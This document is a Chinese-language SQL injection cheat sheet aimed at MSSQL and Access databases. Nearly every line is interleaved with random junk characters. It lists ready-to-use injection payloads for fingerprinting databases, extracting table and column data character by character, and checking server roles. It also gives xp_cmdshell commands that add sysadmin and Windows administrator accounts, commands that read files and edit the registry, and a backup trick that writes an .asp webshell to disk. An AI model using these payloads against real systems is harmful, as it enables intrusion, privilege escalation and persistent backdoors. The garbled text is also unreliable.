1.判断是否有注入;and 1=1 ;and 1=2 aMZ6C <N
2.初步判断是否是mssql ;and user>0 #2_phm'
D
gY2:&0
3.注入参数是字符'and [查询条件] and ''=' lb{*,S
N:d`L+tcc
4.搜索时没过滤参数的'and [查询条件] and '%25'=' GLnj& Ve
%OfaBv&
5.判断数据库系统 w;}P<K
ztgSd8GGE
;and (select count(*) from sysobjects)>0 mssql yew9bn0a=
B\KvKT|\
;and (select count(*) from msysobjects)>0 access , YTuZS
`Kpn@Xg
Sw%=/ g
SL pd~ZC?
6.猜数据库 ;and (select Count(*) from [数据库名])>0 *;Hvx32I
7$Bq.Lc#z
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 <3O>
mJ#u] tiL
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4FGcCE3
%$`pD
I )
9.(1)猜字段的ascii值(access) IZi1N
35B0L.R
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 5z5#_*)O
EXS
1.3>
(2)猜字段的ascii值(mssql) ^Ml)g=Fq
;5PXPpJ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ::9U5E;!
+QtK
"5M
10.测试权限结构(mssql) ojT TYR{
~U~KUL|
_?Rprmjx}
Y71io^td~j
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *]W{83rXQ
w/~,mzM"
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- #If}P$!
dF5EIPl;J
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- TW{.qed8^
HB||'gIC
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \P^WUWY
eqZ V/a
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- c,!Ijn\;(
]A5FN4 E
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- $*H_0w Qc
pLDseEr<
;and 1=(select IS_MEMBER('db_owner'));-- / /3iai
C6M|A3^T
crz )F"
i"0^Gr
11.添加mssql和系统的帐户 % E3
(Z,v)TOXjV
;exec master.dbo.sp_addlogin username;-- t*NZ@)>
;exec master.dbo.sp_password null,username,password;-- w;&J._J
GXYmJ4wR
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5T:e4U&
HIk5Q'e k
;exec master.dbo.xp_cmdshell 'net user username password ymrmvuh
Rd&2mL
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ZMt9'w;
-iR}kP|
;exec master.dbo.xp_cmdshell 'net user username password /add';-- O7g
?x3
<wW#Wnc ]
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- P5P:_hr
#OqQD6
plh.-"
I
^?TabL
12.(1)遍历目录 Q0#oR[(
Rf^$?D&^
;create table dirs(paths varchar(100), id int) |j^^*z@
~-.}]N+([
;insert dirs exec master.dbo.xp_dirtree 'c:\' t:eZ`6o$T\
o:.={)rX
;and (select top 1 paths from dirs)>0 5@%$M$E
MT[V1I{LV
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) IGV @tI
Nv,1F
^vn8s~#
^ r-F@$:.
(2)遍历目录 6NPCp/
MCZTeYnx
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- !g
#
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 jV2L;APCq
6}6;%{p"Gu
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Oh3AbpTT
@%d g0F}h
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 'Ybd'|t{}
|L}zB,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 $sTbFY
~Z9Eb|B
lr'h
|`+kZ-M*
13.mssql中的存储过程 E
(
'r~,~AI
xp_regenumvalues 注册表根键, 子键 ELf cZfJ
tJ>%Xop
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 L.ScC
]VtVw^ ir
xp_regread 根键,子键,键值名 mk(O..)2
4y\qJw)~U
;exec xp_regread W/!M
eTU&E
}Qyuy~-&^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ~P8 6=Vw
^,*ED Yz
xp_regwrite 根键,子键, 值名, 值类型, 值 `Fnl<C<
t2skg
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 !~Gx@Ro
:)o 4fOJ8
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 O=~8+sa
ZKy)F-yX
xp_regdeletevalue 根键,子键,值名 7#d>a=$h
cyrVz4_a
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 me:~q#k
]L+YnZ?6
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 PP)iw@9j
QK% Nt
5$f
vI#NO<
Uc%n{
a-a
14.mssql的backup创建webshell ,5!&}
+`tl<rg;
use model i[_(0P+Da
%J(y2 }
create table cmd(str image); f++MH]I;
p)6!GdT
insert into cmd(str) values (''); R=
,jqW<
Z6s-n$dSm
backup database model to disk='c:\l.asp'; w0qrh\3du
`EKmp|B_p_
G &,1 NjSi
b3R1L|@
15.mssql内置函数 I> <B6pIR
G"k.sRKu
;and (select @@version)>0 获得Windows的版本号 ha[c<e]uo[
qE B3Y54+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa sZe$?k|
T8<pb^#
;and (select user_name())>0 爆当前系统的连接用户 .5L|(B=H
s?Lx\?T
;and (select db_name())>0 得到当前连接的数据库 >QyJRMY
tfB}U.
.#^ta9^t7
?tzJ7PJ~B
16.简洁的webshell be?>C
5
0lpkG
="&r
use model A*+pGQ
Lx%*IE|c
create table cmd(str image); #1Zqq([@
y7CC5S?
insert into cmd(str) values (''); o;'E("!<Z
S]!s)q-- z
backup database model to disk='g:\wwwtest\l.asp';